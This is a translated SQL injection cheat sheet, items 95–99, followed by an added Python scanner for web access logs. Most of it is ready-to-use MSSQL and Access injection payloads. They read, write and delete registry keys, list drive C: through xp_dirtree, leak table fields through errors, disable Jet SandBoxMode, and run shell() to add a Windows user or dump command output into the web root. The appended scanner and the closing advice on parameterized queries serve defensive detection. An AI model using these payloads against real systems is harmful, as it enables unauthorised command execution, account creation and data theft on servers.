
SQL injection statements compiled by 多事之秋 (4).txt


95. Stored procedures in MSSQL
(1) xp_regenumvalues root key, subkey
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'  Returns all values as multiple record sets
(2) xp_regread root key, subkey, value name
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'  Returns the value of the specified key
(3) xp_regwrite root key, subkey, value name, value type, value
There are two value types: REG_SZ for a string and REG_DWORD for an integer
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'  Writes to the registry
(4) xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'  Deletes a value
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'  Deletes a key, including all values under it

96. Code for reading disk directories
(1) ;drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- create the table

(2) ;delete [jm_tmp];Insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- insert the folders and files on drive C: into the table

(3) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//exposes the name of the first folder

(4) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//exposes the name of the second folder

(5) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//exposes the name of the Xth folder or file

(6);drop table [jm_tmp]-- drop the table
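97. Exposing a field of a specified record:
Expose a field of the first record
and (select top 1 column_name from table_name)>0
Expose a field of a specified record (the second record)
and (select column_name from (select top 1 * from (select top 2 * from table_name order by 1) T order by 1 desc)S)>0
and (select column_name from (select top 1 * from (select top x * from table_name order by 1) T order by 1 desc)S)>0  Note: X is the number of the specified record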
98. Executing commands through Access in an sa injection
(1);exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engine\SandBoxMode',REG_DWORD,0--
(2);select * from openRowset('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kev 1986 /add")');--
Note: the tool soshell.exe can also be used
99. Executing commands at an Access injection point
http://127.0.0.1/a.asp?id=1 and 0<>(select shell("cmd.exe /c net user >c:\c:\inetpub\wwwroot/kev.txt))%00
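
Detection side of items 95-99, as an added example that is not part of the original text: a scanner that flags web access-log lines carrying the extended stored procedures, the Jet SandBoxMode key, or the Jet shell() call listed above, even when URL-encoded once or twice. The log format, the signature names, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from items 95-99 above; case-insensitive because
# injected SQL is often written in mixed case.
SIGNATURES = {
    "registry_xp": re.compile(
        r"\bxp_reg(?:enumvalues|read|write|deletevalue|deletekey)\b", re.I),
    "xp_dirtree": re.compile(r"\bxp_dirtree\b", re.I),
    "jet_sandbox": re.compile(r"Jet\\4\.0\\Engine\\SandBoxMode", re.I),
    "openrowset_jet": re.compile(r"\bopenrowset\s*\(\s*'Microsoft\.Jet\.OLEDB", re.I),
    "jet_shell": re.compile(r"\bselect\s+shell\s*\(", re.I),
    "stacked_exec": re.compile(r";\s*exec(?:ute)?\s+(?:master\.\.)?xp_", re.I),
}

def normalize(raw):
    """URL-decode up to twice (double encoding), neutralise NUL bytes,
    and collapse whitespace so the regexes see one canonical form."""
    text = raw
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text.replace("\x00", " "))

def scan_line(line):
    """Return the sorted names of all signatures that match one log line."""
    text = normalize(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan_log(lines):
    """Return (line_number, [signature names]) for every suspicious line."""
    hits = [(n, scan_line(line)) for n, line in enumerate(lines, 1)]
    return [(n, names) for n, names in hits if names]

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 "GET /a.asp?id=1 HTTP/1.1" 200',
    '10.0.0.9 "GET /a.asp?id=1;exec%20xp_regread%20%27HKEY_LOCAL_MACHINE%27 HTTP/1.1" 500',
    '10.0.0.9 "GET /a.asp?id=1;Insert%2520[jm_tmp]%2520exec%2520master..xp_dirtree HTTP/1.1" 500',
    '10.0.0.9 "GET /a.asp?id=1%20and%200<>(select%20shell(%22x%22))%00 HTTP/1.1" 500',
    '10.0.0.7 "GET /search.asp?q=sea+shell+selection HTTP/1.1" 200',
]

if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG):
        print(lineno, ", ".join(names))
```

Signature matching only finds attempts after the fact; the statements above stop working when the application uses parameterized queries and its database login is not sa and has no EXECUTE permission on these extended procedures.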
